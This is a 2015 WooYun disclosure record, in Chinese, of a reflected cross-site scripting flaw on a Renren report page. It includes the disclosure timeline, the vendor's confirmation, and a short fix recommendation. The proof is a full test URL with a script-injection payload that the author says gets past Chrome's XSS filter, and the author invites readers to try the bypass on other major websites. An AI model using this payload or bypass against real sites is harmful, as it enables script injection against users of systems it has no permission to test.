当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144608

漏洞标题:人人网某页面xss自昨天再发一枚

相关厂商:人人网

漏洞作者: 路人甲

提交时间:2015-10-03 12:44

修复时间:2015-11-22 05:52

公开时间:2015-11-22 05:52

漏洞类型:XSS 跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-03: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

RT

详细说明:

昨天是发的人人网-社团人页面-存储型xss
今天早上起来,又找到人人网举报页面存在xss漏洞。以及最新突破chorme拦截限制

漏洞证明:

测试地址:http://support.renren.com/admin/newuserreport.do?type=1&contentId=533135566&origURL=http://www.baidu.com%22/%3E%3Cscript/src=data:,alert(11111)%2b%22
以及过chorme拦截的语句都在测试语句中。Bypass语句比较有通用型,可自行到各大网站开发。

xss.png

修复方案:

开发人员对安全意识淡薄,是可以理解的,毕竟业务需求很大的时候我也是忙着实现,不难忘掉很多安全考虑。。可以考虑对 框架规范完善一下。要求开发人员严格要求框架要求进行业务实现。这样就把安全因素放到框架这个层面实现。开发人员在业务层案规范操作。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-08 05:51

厂商回复:

谢谢,非常感谢您的理解和建议,我们一直在逐步加强员工的安全意识培养,也会尽快进行漏洞修复

最新状态:

暂无